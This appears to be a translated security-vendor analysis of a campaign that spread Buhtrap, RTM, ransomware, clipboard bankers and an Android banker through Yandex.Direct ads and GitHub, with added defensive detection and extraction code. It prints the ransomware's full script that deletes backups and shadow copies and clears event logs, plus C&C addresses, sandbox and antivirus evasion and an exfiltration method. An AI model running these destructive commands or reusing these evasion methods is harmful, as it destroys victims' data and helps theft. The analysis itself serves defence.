Buhtrap backdoor and encryptor distributed via Yandex.Direct

To target accountants in a cyberattack, you can use the work documents they search for online. That is roughly what a cyber group has been doing over the past few months, distributing the known backdoors Buhtrap and RTM, as well as encryptors and cryptocurrency-stealing software. Most of the targets are in Russia. The attack was carried out by placing malicious ads on Yandex.Direct. Potential victims were directed to a website where they were asked to download a malicious file disguised as a document template. Yandex removed the malicious ads after our warning.

Buhtrap's source code was leaked online some time ago, so anyone can use it. We have no information about the availability of the RTM code.

In this post we describe how the attackers distributed the malware using Yandex.Direct and hosted it on GitHub. The post concludes with a technical analysis of the malware.


Buhtrap and RTM are back in business

Distribution mechanism and victims

The various payloads delivered to victims share a common distribution mechanism. All of the malicious files created by the attackers were placed in two different GitHub repositories.

Typically, a repository contained a single downloadable malicious file, which changed frequently. Since GitHub lets you view the change history of a repository, we can see which malware was distributed in a given period. To persuade the victim to download the malicious file, the website blanki-shabloni24[.]ru, shown in the figure above, was used.

The site's design and all of the malicious file names follow a single theme: forms, templates, contracts, samples, and so on. Given that Buhtrap and RTM had already been used in attacks on accountants in the past, we assumed the strategy in the new campaign was similar. The only question was how the victim reached the attackers' website.

Infection

Several potential victims who landed on this site were lured by malicious ads. Below is an example URL:

https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456

As the link shows, the banner was placed on the legitimate accounting forum bb.f2[.]kz. Note that the banners appeared on various sites, all with the same campaign id (blanki_rsya), and most of them related to accounting or legal-assistance services. The URL shows that the potential victim used the search query "download invoice form" (скачать бланк счета), which supports our hypothesis of a targeted attack. Below are the websites on which the banners appeared, with the corresponding search queries.

  • download invoice form - bb.f2[.]kz
  • contract sample - Ipopen[.]ru
  • complaint application sample - 77metrov[.]ru
  • contract form - blank-dogovor-kupli-prodazhi[.]ru
  • court petition sample - zen.yandex[.]ru
  • complaint sample - yurday[.]ru
  • contract form samples - Regforum[.]ru
  • contract form - assistentus[.]ru
  • apartment contract sample - napravah[.]com
  • legal contract samples - avito[.]ru

The blanki-shabloni24[.]ru site was probably designed to pass a cursory visual inspection. Usually an ad pointing to a decent-looking site with a link to GitHub does not look like anything obviously bad. In addition, the attackers uploaded the malicious files to the repository only for limited periods, probably only for the duration of a campaign. Most of the time the GitHub repository contained an empty zip archive or an empty EXE file. Thus the attackers could distribute ads through Yandex.Direct on sites that accountants were likely to visit in response to specific search queries.

Next, let's look at the various payloads distributed this way.

Payload analysis

Distribution timeline

The malicious campaign began in late October 2018 and is still active at the time of writing. Since the whole repository was publicly available on GitHub, we compiled an exact timeline of the distribution of six different malware families (see the figure below). We added a line showing when the banner link was first observed, as measured by ESET telemetry, for comparison with the git history. As you can see, this correlates well with the availability of the payload on GitHub. The discrepancy at the end of February can be explained by the fact that we were missing part of the change history, because the repository was removed from GitHub before we could retrieve it in full.

Figure 1. Timeline of malware distribution.

Code-signing certificates

The campaign used several certificates. Some of them signed more than one malware family, which again suggests that the different samples belong to the same campaign. Although they had the private key, the operators did not sign binaries systematically and did not use the key for all samples. In late February 2019 the attackers started producing invalid signatures with a Google certificate for which they did not have the private key.

All certificates involved in the campaign, and the malware families they sign, are listed in the table below.

[Table: code-signing certificates used in the campaign and the malware families they sign]

We also used these code-signing certificates to establish links with other malware families. For most of the certificates we found no samples that were not distributed through the GitHub repository. However, the TOV "MARIYA" certificate was used to sign malware of the Wauchos botnet, adware and miners. It is unlikely that this malware is related to the present campaign. Most likely, the certificate was bought on the darknet.

Win32/Filecoder.Buhtrap

The first thing that caught our attention was the newly discovered Win32/Filecoder.Buhtrap. It is a Delphi binary that is sometimes packed. It was mainly distributed in February and March 2019. It behaves as a ransomware program is expected to: it searches local drives and network shares and encrypts the files it finds. It does not need an Internet connection to compromise a machine, because it does not contact a server to send encryption keys. Instead, it appends a "token" to the end of the ransom note and suggests using email or Bitmessage to contact the operators.

To encrypt as many valuable resources as possible, Filecoder.Buhtrap runs a thread designed to shut down key software that may hold open handles on files containing valuable information, since those handles could interfere with encryption. The targeted processes are mainly database management systems (DBMS). In addition, Filecoder.Buhtrap deletes log files and backups to make data recovery harder. To do this, it runs the batch script below.

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
attrib "%userprofile%\documents\Default.rdp" -s -h
del "%userprofile%\documents\Default.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
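As an added example (not code from the analysis or from the malware), the detection logic a defender would run over process-creation telemetry to catch the pre-encryption steps in the script above. The log records, the key=value layout and the host names are constructed for the example; the rules cover the recovery-inhibition, backup-deletion, shadow-copy-deletion, RDP-history-wiping and event-log-clearing commands, and a host is flagged only when several distinct techniques appear together.

```python
import re

# Constructed process-creation records (not real telemetry) in a simplified
# key=value layout; the CommandLine values echo the batch script above.
SAMPLE_LOG = """\
host=acct-pc1 pid=4120 image=C:\\Windows\\System32\\cmd.exe CommandLine=cmd.exe /c bcdedit /set {default} recoveryenabled no
host=acct-pc1 pid=4124 image=C:\\Windows\\System32\\wbadmin.exe CommandLine=wbadmin delete catalog -quiet
host=acct-pc1 pid=4130 image=C:\\Windows\\System32\\vssadmin.exe CommandLine=vssadmin delete shadows /all /quiet
host=acct-pc1 pid=4131 image=C:\\Windows\\System32\\wbem\\WMIC.exe CommandLine=wmic shadowcopy delete
host=acct-pc1 pid=4140 image=C:\\Windows\\System32\\wevtutil.exe CommandLine=wevtutil.exe clear-log Security
host=acct-pc1 pid=4142 image=C:\\Windows\\System32\\sc.exe CommandLine=sc config eventlog start=disabled
host=acct-pc2 pid=900 image=C:\\Windows\\System32\\vssadmin.exe CommandLine=vssadmin list shadows
host=acct-pc2 pid=910 image=C:\\Windows\\System32\\wevtutil.exe CommandLine=wevtutil.exe qe Application /c:5
"""

# One rule per technique in the script. Patterns are deliberately loose
# (optional .exe, flexible whitespace) so minor variations still match.
RULES = [
    ("inhibit_recovery", re.compile(r"bcdedit\s+/set\s+\{default\}\s+(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)", re.I)),
    ("delete_backups", re.compile(r"wbadmin\s+delete\s+(catalog|systemstatebackup|backup)", re.I)),
    ("delete_shadows", re.compile(r"vssadmin\s+delete\s+shadows|wmic\s+shadowcopy\s+delete", re.I)),
    ("clear_eventlog", re.compile(r"wevtutil(\.exe)?\s+(cl|clear-log)\s+(application|security|system)", re.I)),
    ("disable_eventlog", re.compile(r"sc\s+config\s+eventlog\s+start=\s*disabled", re.I)),
    ("wipe_rdp_history", re.compile(r'reg\s+delete\s+"?HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client', re.I)),
]


def parse_line(line):
    """Split one record into a dict; CommandLine is kept whole, spaces included."""
    head, _, cmdline = line.partition(" CommandLine=")
    fields = dict(kv.split("=", 1) for kv in head.split())
    fields["CommandLine"] = cmdline
    return fields


def match_rules(cmdline):
    """Labels of every rule that matches a single command line."""
    return [label for label, rx in RULES if rx.search(cmdline)]


def score_hosts(log_text, threshold=2):
    """Collect distinct rule hits per host and return the hosts at or above
    threshold. One shadow-copy deletion may be legitimate admin work; several
    distinct techniques on one host in the same log window is the
    pre-encryption pattern described above."""
    hits = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_line(line)
        for label in match_rules(ev["CommandLine"]):
            hits.setdefault(ev["host"], set()).add(label)
    return {h: sorted(v) for h, v in hits.items() if len(v) >= threshold}


if __name__ == "__main__":
    for host, labels in score_hosts(SAMPLE_LOG).items():
        print(f"{host}: {', '.join(labels)}")
```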

Filecoder.Buhtrap uses the legitimate online service IP Logger, which is designed to collect information about website visitors. This is done to keep track of the ransomware's victims, and it is the job of the following command line:

mshta.exe "javascript:document.write('');"

Files are selected for encryption if they do not match any of three exclusion lists. First, files with the following extensions are not encrypted: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys and .bat. Second, all files whose full path contains one of the directory strings from the list below are excluded.

.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
google\chrome
google
boot
application data
apple computer\safari
appdata
all users
:\windows
:\system volume information
:\nvidia
:\intel

Third, certain file names are also excluded from encryption, among them the file name of the ransom note. The list is given below. Obviously, all of these exclusions are meant to keep the machine bootable, but with minimal usability.

boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe

File encryption scheme

Once run, the malware generates a 512-bit RSA key pair. The private exponent (d) and modulus (n) are then encrypted with a hard-coded 2048-bit public key (public exponent and modulus), zlib-compressed and base64-encoded. The code responsible for this is shown in Figure 2.

Figure 2. Hex-Rays decompilation of the 512-bit RSA key pair generation.

Below is an example of the plaintext with a generated private key, which is the token appended to the ransom note.

DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239

The attackers' public key exponent e and modulus n are hard-coded in the binary.

Files are encrypted with AES-128-CBC using a 256-bit key. A new key and a new initialization vector are generated for each encrypted file. The key information is appended to the end of the encrypted file. Let's look at the format of an encrypted file.
Encrypted files have the following header:

[Image: encrypted file header, beginning with the VEGA magic value]

The source file data, together with the VEGA magic value, is encrypted up to the first 0x5000 bytes. All decryption information is appended to the file in the following structure:

[Image: structure of the trailer appended to the encrypted file; its fields are described below]

- The file size marker contains a flag indicating whether the file is larger than 0x5000 bytes.
- AES key blob = ZlibCompress(RSAEncrypt(AES key + IV, public key of the generated RSA key pair))
- RSA key blob = ZlibCompress(RSAEncrypt(generated RSA private key, hard-coded RSA public key))

Win32/ClipBanker

Win32/ClipBanker is a component that was distributed intermittently from late October to early December 2018. Its job is to monitor the contents of the clipboard, looking for cryptocurrency wallet addresses. When it finds a wallet address, ClipBanker replaces it with an address presumably belonging to the operators. The samples we examined were neither packed nor obfuscated. The only mechanism used to mask the behavior is string encryption. The operators' wallet addresses are encrypted with RC4. The targeted cryptocurrencies are Bitcoin, Bitcoin Cash, Dogecoin, Ethereum and Ripple.

During the period in which the malware was spreading, only small amounts of BTC were sent to the attackers' wallets, which casts doubt on the success of the campaign. Moreover, there is no evidence that these transactions were related to ClipBanker at all.

Win32/RTM

The Win32/RTM component was distributed for several days in early March 2019. RTM is a banking Trojan written in Delphi that targets remote banking systems. In 2017, ESET researchers published a detailed analysis of this program, and that description is still relevant. In January 2019, Palo Alto Networks also published a blog post about RTM.

Buhtrap loader

For a while, a downloader that bore no resemblance to the earlier Buhtrap tools was available on GitHub. It contacts https://94.100.18[.]67/RSS.php?<some_id> to fetch the next stage and loads it directly into memory. We can distinguish two behaviors of the second-stage code. In the first, the RSS.php URL delivered the Buhtrap backdoor directly; this backdoor is very similar to the one that became available after the source code leak.

Interestingly, we see several campaigns with the Buhtrap backdoor, which are supposedly run by different operators. In this case, the main difference is that the backdoor is loaded directly into memory and does not use the usual scheme with the DLL deployment process that we mentioned earlier. In addition, the operators changed the RC4 key used to encrypt network traffic to the C&C server. In most of the campaigns we have seen, the operators did not bother to change this key.

The second, more complex behavior was that the RSS.php URL was passed to another loader. It implemented some obfuscation, such as rebuilding the import table. The purpose of this loader is to contact the C&C server msiofficeupd[.]com/api/F27F84EDA4D13B15/2, send logs and wait for a response. It treats the response as a blob, loads it into memory and executes it. The payload we observed being loaded by this loader was the same Buhtrap backdoor, but there may be other components.

Android/Spy.Banker

Interestingly, an Android component was also found in the GitHub repository. It was in the master branch for only one day: November 1, 2018. Apart from its posting on GitHub, ESET telemetry shows no evidence of this malware being distributed.

The component was packaged as an Android Application Package (APK). It is heavily obfuscated. The malicious behavior is hidden in an encrypted JAR inside the APK. It is encrypted with RC4 using this key:

key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]

The same key and algorithm are used to encrypt strings. The JAR is located at APK_ROOT + image/files. The first four bytes of the file contain the length of the encrypted JAR, which starts immediately after the length field.
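As an added analyst's example (not code from the analysis or from the malware), a Python extractor for the image/files blob described above: it implements RC4 with the key quoted above, reads the 4-byte length prefix (the analysis does not state its byte order; little-endian is assumed here) and checks that the result carries a ZIP/JAR signature before handing it back. The sample blob is constructed inside the block with the same routine.

```python
import struct

# RC4 key quoted in the analysis above
KEY = bytes([
    0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
    0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
    0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96,
])


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def extract_jar(blob: bytes) -> bytes:
    """Parse the image/files blob: 4-byte length, then the RC4-encrypted JAR.
    Little-endian length is an assumption; the PK check below catches a wrong
    guess or a wrong key instead of returning garbage."""
    if len(blob) < 4:
        raise ValueError("blob too short for a length field")
    (length,) = struct.unpack("<I", blob[:4])
    if length > len(blob) - 4:
        raise ValueError("length field exceeds blob size")
    jar = rc4(KEY, blob[4:4 + length])
    if jar[:2] != b"PK":
        raise ValueError("decrypted data is not a ZIP/JAR (no PK signature)")
    return jar


def decrypt_string(enc: bytes) -> str:
    """Strings in the APK use the same key and algorithm."""
    return rc4(KEY, enc).decode("utf-8")


# Constructed stand-in for the real payload: a minimal ZIP-like header wrapped
# the way the analysis describes (length prefix + RC4) using the same rc4().
FAKE_JAR = b"PK\x03\x04" + b"\x00" * 26 + b"META-INF/MANIFEST.MF"
SAMPLE_BLOB = struct.pack("<I", len(FAKE_JAR)) + rc4(KEY, FAKE_JAR) + b"\xaa\xbb"  # trailing bytes ignored

if __name__ == "__main__":
    print(len(extract_jar(SAMPLE_BLOB)), "bytes of JAR recovered")
```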

Having decrypted the file, we found that it was Anubis, a previously documented Android banker. The malware has the following capabilities:

  • microphone recording
  • taking screenshots
  • obtaining GPS coordinates
  • keylogger
  • encrypting device data and demanding a ransom
  • sending spam

Interestingly, the banker used Twitter as a backup communication channel to obtain another C&C server. The sample we analyzed used the @JonesTrader account, but by the time of the analysis it had already been blocked.

The banker contains a list of target applications on the Android device. It is longer than the list found in the Sophos study. The list includes many banking applications, online shopping programs such as Amazon and eBay, and cryptocurrency services.

MSIL/ClipBanker.IH

The last component distributed as part of this campaign was a .NET Windows executable, which appeared in March 2019. Most of the versions studied were packed with ConfuserEx v1.0.0. Like ClipBanker, this component uses the clipboard. Its target is a wide range of cryptocurrencies, as well as trade offers on Steam. In addition, it uses the IP Logger service to steal the Bitcoin private key in WIF format.

Protection mechanisms

In addition to the advantages ConfuserEx offers in preventing debugging, dumping and tampering, this component includes the ability to detect antivirus products and virtual machines.

To check whether it is running in a virtual machine, the malware uses the built-in Windows WMI command-line tool (WMIC) to request BIOS information, namely:

wmic bios

The program then parses the command output and looks for the keywords VBOX, VirtualBox, XEN, qemu, bochs and VM.

To detect antivirus products, the malware sends a Windows Management Instrumentation (WMI) query to the Windows Security Center using the ManagementObjectSearcher API, as shown below. After decoding from base64, the call looks like this:

ManagementObjectSearcher('root\SecurityCenter2', 'SELECT * FROM AntivirusProduct')

Figure 3. Antivirus product detection method.

In addition, the malware checks whether CryptoClipWatcher, a tool that protects against clipboard attacks, is running and, if so, suspends all threads in that process, thereby disabling the protection.

Persistence

The version of the malware we studied copies itself to %APPDATA%\google\updater.exe and sets the "hidden" attribute on the google directory. It then modifies the Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell value in the Windows registry and appends the path to updater.exe. This way, the malware is executed every time the user logs in.

Malicious behavior

Like ClipBanker, the malware monitors the contents of the clipboard and looks for cryptocurrency wallet addresses; when it finds one, it replaces it with one of the operators' addresses. Below is a list of the targeted address types, based on what is found in the code.

BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL

Each address type has a corresponding regular expression. The STEAM_URL value is used to attack the Steam system, as can be seen from the regular expression used to identify it in the clipboard buffer:

\b(https://|http://|)steamcommunity.com/tradeoffer/new/\?partner=[0-9]+&token=[a-zA-Z0-9]+\b
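As an added example (not code from the analysis or from the malware), the core check a clipboard-protection tool like the CryptoClipWatcher mentioned above has to make: it classifies clipboard contents with the STEAM_URL regular expression quoted above plus a few approximate address patterns of my own (assumptions, not the malware's), and raises an alert when an address is replaced by a different address of the same class within a short window with no user action in between. The clipboard snapshots are constructed for the example.

```python
import re

# STEAM_URL is the expression quoted in the analysis above; the others are
# approximations of the address formats (assumptions), not the malware's own.
PATTERNS = {
    "STEAM_URL": re.compile(r"\b(https://|http://|)steamcommunity\.com/tradeoffer/new/\?partner=[0-9]+&token=[a-zA-Z0-9]+\b"),
    "BTC_P2PKH": re.compile(r"\b1[a-km-zA-HJ-NP-Z1-9]{25,34}\b"),
    "BTC_P2SH": re.compile(r"\b3[a-km-zA-HJ-NP-Z1-9]{25,34}\b"),
    "BTC_BECH32": re.compile(r"\bbc1[a-z0-9]{25,60}\b"),
    "ETH_ERC20": re.compile(r"\b0x[a-fA-F0-9]{40}\b"),
}


def classify(text):
    """Return (address class, matched value) for the first pattern that hits, else None."""
    for name, rx in PATTERNS.items():
        m = rx.search(text)
        if m:
            return name, m.group(0)
    return None


def detect_swaps(snapshots, max_gap=2.0):
    """snapshots: ordered list of (timestamp_seconds, clipboard_text).
    A clipboard swap looks like one address being replaced by a *different*
    address of the *same* class almost immediately, with nothing else copied
    in between. Returns a list of alert dicts."""
    alerts = []
    prev = None  # (timestamp, (class, value)) of the last address seen
    for ts, text in snapshots:
        cur = classify(text)
        if prev and cur and cur[0] == prev[1][0] and cur[1] != prev[1][1] and ts - prev[0] <= max_gap:
            alerts.append({"class": cur[0], "original": prev[1][1], "replaced_with": cur[1], "at": ts})
        prev = (ts, cur) if cur else None  # non-address content resets the chain
    return alerts


# Constructed clipboard history: a real-looking BTC address replaced within
# 0.2 s, a Steam trade offer replaced within 0.1 s, and a later Steam URL
# copied 15 s afterwards by the user (no alert).
SAMPLE_SNAPSHOTS = [
    (0.0, "Invoice 2019-03-04"),
    (1.0, "1BoatSLRHtKNngkdXEeobR76b53LETtpyT"),
    (1.2, "1CounterpartyXXXXXXXXXXXXXXXUWLpVr"),
    (5.0, "https://steamcommunity.com/tradeoffer/new/?partner=123456&token=abcDEF12"),
    (5.1, "https://steamcommunity.com/tradeoffer/new/?partner=999999&token=zzzZZZ99"),
    (20.0, "https://steamcommunity.com/tradeoffer/new/?partner=111111&token=ok"),
]

if __name__ == "__main__":
    for a in detect_swaps(SAMPLE_SNAPSHOTS):
        print(f"{a['class']} swapped at t={a['at']}: {a['original']} -> {a['replaced_with']}")
```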

Exfiltration channel

In addition to replacing addresses in the buffer, the malware targets the private WIF keys of Bitcoin, Bitcoin Core and Electrum Bitcoin wallets. The program uses iplogger.org as an exfiltration channel to obtain the WIF private key. To do this, the operators put the private key data into the User-Agent HTTP header, as shown below.

Figure 4. IP Logger console with exfiltrated data.

The operators did not use iplogger.org to exfiltrate wallets. They probably used a different method because of the 255-character limit on the User-Agent field displayed in the IP Logger web interface. In the samples we studied, another exfiltration server was stored in the DiscordWebHook environment variable. Surprisingly, this environment variable is not assigned anywhere in the code. This suggests that the malware is still under development and that this version was built for the operator's test machine.

There is another sign that the program is under development. The binary includes two iplogger.org URLs, and both are queried when data is exfiltrated. In the request to one of these URLs, the value in the Referer field is prefixed with "DEV /". We also found a version that was not packed with ConfuserEx, in which this URL is called DevFeedbackUrl. Based on the environment variable name, we believe the operators plan to use the legitimate Discord service and its web hook system to steal cryptocurrency wallets.

Conclusion

This campaign is an example of the use of legitimate advertising services in cyberattacks. The scheme targets Russian organizations, but we would not be surprised to see such an attack using non-Russian services. To avoid compromise, users should be confident of the reputation of the source of the software they download.

The full list of indicators of compromise and MITRE ATT&CK attributes is available at the link.

Source: www.habr.com
